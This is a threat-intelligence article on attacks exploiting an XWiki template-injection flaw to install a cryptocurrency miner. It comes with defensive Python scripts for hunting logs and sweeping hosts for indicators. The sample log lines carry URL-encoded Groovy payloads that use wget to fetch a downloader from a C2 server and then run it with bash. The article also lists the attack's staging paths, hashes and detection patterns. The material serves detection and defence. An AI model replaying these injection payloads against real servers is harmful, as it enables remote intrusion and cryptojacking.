Critical XWiki Vulnerability Exploited to Deploy Cryptocurrency Miners
A critical remote code execution (RCE) vulnerability in XWiki, a widely used open-source wiki platform, has been actively exploited to deploy cryptocurrency mining malware on compromised servers. The flaw, tracked as CVE-2025-24893, is a template injection: an unauthenticated attacker can submit wiki markup that the server renders, so attacker-supplied Groovy code executes on the host without any login.
The exploitation of this vulnerability underscores the escalating threats to web applications, where real-world attacks often outpace official alerts from organizations like the Cybersecurity and Infrastructure Security Agency (CISA). VulnCheck, a vulnerability intelligence firm, reported observing the exploitation through its Canary network, a set of deliberately exposed systems that imitate vulnerable software in order to capture attacks.
Unlike earlier reports that noted only exploit attempts, VulnCheck's findings describe a complete two-stage attack originating from an IP address in Vietnam. The vulnerability, added to VulnCheck's own Known Exploited Vulnerabilities (KEV) catalog in March 2025, is a template injection in XWiki's SolrSearch endpoint that lets attackers run Groovy scripts and, through them, arbitrary system commands. Its absence from CISA's KEV at the time of the report shows how exploitation can surge before formal recognition, leaving organizations exposed.
The Two-Stage Exploitation Process
The attack unfolds in two phases roughly 20 minutes apart; separating the download from the execution makes the two requests harder to correlate and helps the activity evade detection.
1. Initial Request: The attacker sends a URL-encoded GET request to the SolrSearch endpoint, injecting a Groovy payload wrapped in XWiki's `{{async}}` macro that uses `wget` to fetch a downloader script named `x640` from a command-and-control (C2) server at 193.32.208.24:8080 and save it as `/tmp/11909` on the target. The request carries a Firefox User-Agent string so it blends in with ordinary browser traffic.
2. Second Request: About 20 minutes later, a second request to the same endpoint runs `bash` on `/tmp/11909`. That downloader then fetches two further scripts, `x521` and `x522`, and pipes each directly into `bash`.
These scripts handle the payload delivery:
– x521: Creates working directories under `/var/tmp`, downloads the coin-miner binary `tcrond` from the same C2 server, and marks it executable.
– x522: Clears out the competition by killing rival miners such as `xmrig` and `kinsing`, wipes shell history, and launches `tcrond` with a configuration that points it at the `auto.c3pool.org` mining pool on port 80.
The miner binary is UPX-packed to hinder analysis and pays out to a hard-coded Monero wallet address, the hallmarks of a low-sophistication but persistent cryptojacking operation. Both exploitation requests came from 123.25.249.88, an address flagged in multiple AbuseIPDB reports for abusive activity.
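To turn the two-request pattern above into something a defender can hunt for, the following Python script is an added example (my own code, not VulnCheck's or the XWiki project's). It parses web-server access logs, URL-decodes each request, flags SolrSearch requests that carry wiki macro syntax or campaign indicators from the report, and then correlates source IPs that issued two such requests within a window, mirroring the staged download-then-execute sequence. The log lines are constructed; their query strings reconstruct the payload from the report's description together with the `{{async}}`/`{{groovy}}` macro syntax in the public advisory, and the `text` parameter name is taken from that advisory rather than from this page.

```python
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample access-log lines (Combined Log Format); not taken from the report.
# The two 123.25.249.88 lines mirror the stages the report describes: SolrSearch
# requests whose `text` parameter carries {{async}}{{groovy}} macros, ~20 minutes apart.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
123.25.249.88 - - [20/Mar/2025:10:05:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22wget%20http%3A%2F%2F193.32.208.24%3A8080%2Fx640%20-O%20%2Ftmp%2F11909%22.execute()%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
198.51.100.4 - - [20/Mar/2025:10:06:30 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=deployment+guide HTTP/1.1" 200 2048 "-" "curl/8.4.0"
123.25.249.88 - - [20/Mar/2025:10:27:45 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22bash%20%2Ftmp%2F11909%22.execute()%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 812 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of wiki-macro injection in a rendered request parameter, plus the Groovy
# idiom for spawning a process. Matched case-insensitively after URL decoding.
INJECTION_MARKERS = ("{{groovy", "{{async", "{{/groovy", ".execute(")
# Network and file indicators from the report.
IOC_IPS = {"123.25.249.88", "193.32.208.24"}
IOC_STRINGS = ("193.32.208.24", "/tmp/11909", "/x640", "/x521", "/x522", "tcrond")


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m["path"]
    # Decode twice: the observed payload is encoded once, but double-encoding is a
    # common evasion, and a second pass over already-decoded text is harmless.
    decoded = unquote(unquote(path))
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": path,
        "decoded": decoded,
        "status": int(m["status"]),
    }


def classify(event):
    """Return the list of reasons an event is suspicious (empty if it is not)."""
    reasons = []
    low = event["decoded"].lower()
    if "solrsearch" in low and any(marker in low for marker in INJECTION_MARKERS):
        reasons.append("solrsearch-macro-injection")
    if event["ip"] in IOC_IPS:
        reasons.append("known-attacker-ip")
    if any(s.lower() in low for s in IOC_STRINGS):
        reasons.append("campaign-ioc-in-request")
    return reasons


def hunt(log_text):
    """Run classify() over every parsable line and keep the suspicious ones."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        reasons = classify(ev)
        if reasons:
            findings.append({**ev, "reasons": reasons})
    return findings


def two_stage_sources(findings, window_minutes=60):
    """IPs that sent two or more macro-injection requests within the window, matching
    the report's stage-then-execute pattern. Returns {ip: minutes between first and last}."""
    by_ip = {}
    for f in findings:
        if "solrsearch-macro-injection" in f["reasons"]:
            by_ip.setdefault(f["ip"], []).append(f["ts"])
    staged = {}
    for ip, times in by_ip.items():
        times.sort()
        gap = (times[-1] - times[0]).total_seconds() / 60
        if len(times) >= 2 and gap <= window_minutes:
            staged[ip] = round(gap, 2)
    return staged


if __name__ == "__main__":
    hits = hunt(SAMPLE_LOG)
    for h in hits:
        print(h["ts"].isoformat(), h["ip"], h["reasons"])
    print("two-stage sources:", two_stage_sources(hits))
```

On real logs, feed `hunt()` the contents of the reverse proxy or servlet-container access log in front of XWiki; the macro-marker check catches the injection regardless of which C2 or script names a future campaign uses, while the IP and string indicators are specific to this one and will age out.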
Key Indicators
Defenders can use the following indicators to hunt for similar activity across their networks. The campaign also uses `transfer.sh` to host payloads, a common tactic in cryptojacking operations.
– IP Addresses:
– 123.25.249.88 (Attacker, Vietnam)
– 193.32.208.24 (C2 Server)
– File Hashes (SHA-1):
– tcrond (packed): 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
– tcrond (unpacked): 90d274c7600fbdca5fe035250d0baff20889ec2b
– x521: de082aeb01d41dd81cfb79bc5bfa33453b0022ed
– x522: 2abd6f68a24b0a5df5809276016e6b85c77e5f7f
– x640: 5abc337dbc04fee7206956dad1e0b6d43921a868
– CVSS Score: 9.8 (Critical). Unauthenticated RCE via template injection; fixed in XWiki 15.10.11 and 16.4.1, with earlier 15.x and 16.x releases affected
– Affected Products: XWiki (XWiki Standard, formerly XWiki Enterprise); any server hosting a vulnerable instance is exposed
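As an added example for sweeping hosts with the indicators above (my own code, not from the report or the XWiki project): the digests listed are 40 hexadecimal characters, so they are SHA-1 values, and this Python script hashes files under `/tmp` and `/var/tmp` with SHA-1, compares them against the list, flags the staging paths the report names (`/tmp/11909`, `/var/tmp/tcrond`), and checks for the `UPX!` marker that a UPX-packed binary such as `tcrond` carries near the start of the file. `make_demo_root` builds a constructed directory tree with placeholder files (not the malware) so the scanner can be exercised offline.

```python
import hashlib
import os
import tempfile

# Hashes from the report. They are 40 hex digits, i.e. SHA-1 digests, so the
# comparison below uses SHA-1.
KNOWN_SHA1 = {
    "0b907eee9a85d39f8f0d7c503cc1f84a71c4de10": "tcrond (UPX-packed)",
    "90d274c7600fbdca5fe035250d0baff20889ec2b": "tcrond (unpacked)",
    "de082aeb01d41dd81cfb79bc5bfa33453b0022ed": "x521",
    "2abd6f68a24b0a5df5809276016e6b85c77e5f7f": "x522",
    "5abc337dbc04fee7206956dad1e0b6d43921a868": "x640",
}
# Staging locations the report names, relative to the filesystem root being scanned.
STAGING_PATHS = {"tmp/11909", "var/tmp/tcrond"}
SCAN_DIRS = ("tmp", "var/tmp")
UPX_MAGIC = b"UPX!"


def sha1_of(path, chunk=1 << 16):
    """SHA-1 of a file, streamed so large binaries do not need to fit in memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_upx_packed(path):
    """UPX writes its 'UPX!' marker in the loader header near the start of a packed
    ELF image, so the first 4 KiB is enough to spot binaries like tcrond."""
    with open(path, "rb") as f:
        return UPX_MAGIC in f.read(4096)


def scan_host(root="/"):
    """Walk the scan directories under `root` and return sorted
    (relative_path, sha1, reasons) tuples for files matching any indicator."""
    findings = []
    for d in SCAN_DIRS:
        for dirpath, _, names in os.walk(os.path.join(root, d)):
            for name in names:
                full = os.path.join(dirpath, name)
                if not os.path.isfile(full) or os.path.islink(full):
                    continue
                rel = os.path.relpath(full, root)
                reasons = []
                try:
                    digest = sha1_of(full)
                    if is_upx_packed(full):
                        reasons.append("upx-packed")
                except OSError:
                    continue  # unreadable file; skip rather than abort the sweep
                if digest in KNOWN_SHA1:
                    reasons.append("hash:" + KNOWN_SHA1[digest])
                if rel in STAGING_PATHS:
                    reasons.append("staging-path")
                if reasons:
                    findings.append((rel, digest, reasons))
    return sorted(findings)


def make_demo_root():
    """Build a constructed tree under a temp dir with the staging paths the report
    describes. Contents are placeholders, not the real scripts or miner."""
    root = tempfile.mkdtemp(prefix="xwiki-ioc-")
    os.makedirs(os.path.join(root, "tmp"))
    os.makedirs(os.path.join(root, "var", "tmp"))
    with open(os.path.join(root, "tmp", "11909"), "wb") as f:
        f.write(b"#!/bin/bash\necho placeholder downloader\n")
    with open(os.path.join(root, "var", "tmp", "tcrond"), "wb") as f:
        # Fake ELF header followed by the UPX marker where a packed binary carries it.
        f.write(b"\x7fELF" + b"\x00" * 60 + UPX_MAGIC + b"\x00" * 100)
    with open(os.path.join(root, "var", "tmp", "notes.txt"), "wb") as f:
        f.write(b"benign file\n")
    return root


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_demo_root()
    for rel, digest, reasons in scan_host(root):
        print(f"{rel}  sha1={digest}  {', '.join(reasons)}")
```

Run it as root with `/` (or a mounted disk image) as the argument. The hash and path matches are precise; the UPX check is a heuristic that also fires on any file containing the four bytes `UPX!`, so treat it as a prompt to look closer rather than a verdict. Live process names and connections to `auto.c3pool.org` are separate checks this file sweep does not cover.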
Organizations running XWiki should upgrade immediately to 15.10.11 or 16.4.1 (or later), review web-server logs for SolrSearch requests carrying wiki macro syntax such as `{{groovy}}`, watch for outbound `wget` fetches to 193.32.208.24:8080 and connections to `auto.c3pool.org`, and sweep hosts for `/tmp/11909`, `/var/tmp/tcrond`, and the hashes above. VulnCheck's Canaries demonstrate the value of proactive threat intelligence in bridging the gaps left by delayed official listings.